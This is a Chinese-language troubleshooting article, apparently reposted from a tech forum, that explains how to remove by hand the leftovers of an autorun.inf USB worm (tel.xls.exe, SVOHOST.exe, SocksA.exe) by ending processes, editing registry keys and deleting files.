  故障分析:上网搜索了一下,根据查到的资料基本上可以确定笔者是在浏览网页或传输文件的过程中中木马毒引起的。于是笔者开启杀毒软件NOD32(已经升级到最新版本)对硬盘进行了一次深度杀毒,奇怪的是一个病毒也没有找到。由于本人每天都进行病毒扫描,估计病毒早已经被本人杀掉了。根据查到的资料分析,很可能是病毒在D盘残留了一个文件autorun.inf(某些病毒便常常借助此文件在电脑中自动运行),但它本身并无病毒特征,杀毒软件杀毒时未能将它彻底清除干净,但它残留后却给电脑带来了后遗症——导致硬盘无法正常打开。

  故障解决:由于autorun.inf是一个隐藏较深的文件,当笔者将文件夹选项中的选项选择为“显示所有文件和文件夹”也没能在D盘发现此文件的身影,所以在这里笔者将巧妙地利用最常用的WinRAR来进行清除。首先运行WinRAR软件,在界面中我们点击地址栏右侧下拉列表,将路径切换到D盘根目录,这个时候我们发现D盘下面的隐藏文件“autorun.inf”终于出现了,不用多说了,在文件上点右键选择“删除文件”。现在试一下,D盘果然可以正常打开了。不过还没完,下面别忘了清除注册表项目,打开注册表,查找“pagefile.pif”内容,找到一个shell键,其下级的键值为“D:pagefile.pif”,将此键删除,至此病毒残留清理完毕。

如何清除无法显示隐藏文件病毒的绝招

作者:done 来源:赛迪网技术社区

选择“显示隐藏文件”这一选项后,发现U盘有个文件闪出来一下就马上又消失了,而再打开文件夹选项时,发现仍就是“不显示隐藏文件”这一选项。而且刚发现点击C、D等盘符图标时会另外打开一个窗口!

总结

I、病情描述

1、无法显示隐藏文件;

2、点击C、D等盘符图标时会另外打开一个窗口;

3、用Winrar查看时发现C、D等根目录下有autorun.inf和tel.xls.exe两个恶心的文件;

4、任务管理器中的应用进程一栏里有个莫明其妙的kill;

5、开机启动项中有莫明其妙的SocksA.exe。

II、解决办法

用了一些专杀工具和DOS下的批处理文件,都不好使,只好DIY。注意在以下整个过程中不要双击硬盘分区,需要打开时用鼠标右键—>打开。

一、关闭病毒进程

在任务管理器应用程序里面查找类似kill等你不认识的进程,右键—>转到进程,找到类似SVOHOST.exe(也可能就是某个svchost.exe)的进程,右键—>结束进程树。

二、显示出被隐藏的系统文件

开始—>运行—>regedit

HKEY_LOCAL_MACHINE\Software\Microsoft\windows\

CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL

删除CheckedValue键值,单击右键 新建—>Dword值—>命名为CheckedValue,然后修改它的键值为1,这样就可以选择“显示所有隐藏文件”和“显示系统文件”。

三、删除病毒

在分区盘上单击鼠标右键—>打开,看到每个盘跟目录下有autorun.inf 和tel\.xls\.exe 两个文件,将其删除,U盘同样。

四、删除病毒的自动运行项

开始—>运行—>msconfig—>启动—>删除类似sacksa.exe、SocksA.exe之类项,或者打开注册表运行regedit

HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Run

删除类似C:\WINDOWS\system32\SVOHOST.exe 的项。

五、删除遗留文件

C:\WINDOWS\ 跟 C:\WINDOWS\system32\ 目录下删除SVOHOST.exe(注意系统有一个类似文件,图标怪异的那个类似excel的图标的是病毒)session.exe、sacaka.exe、SocksA.exe以及所有excel类似图标的文件,每个文件夹两个,不要误删哦,自己注意。重启电脑后,基本可以了。

推广链接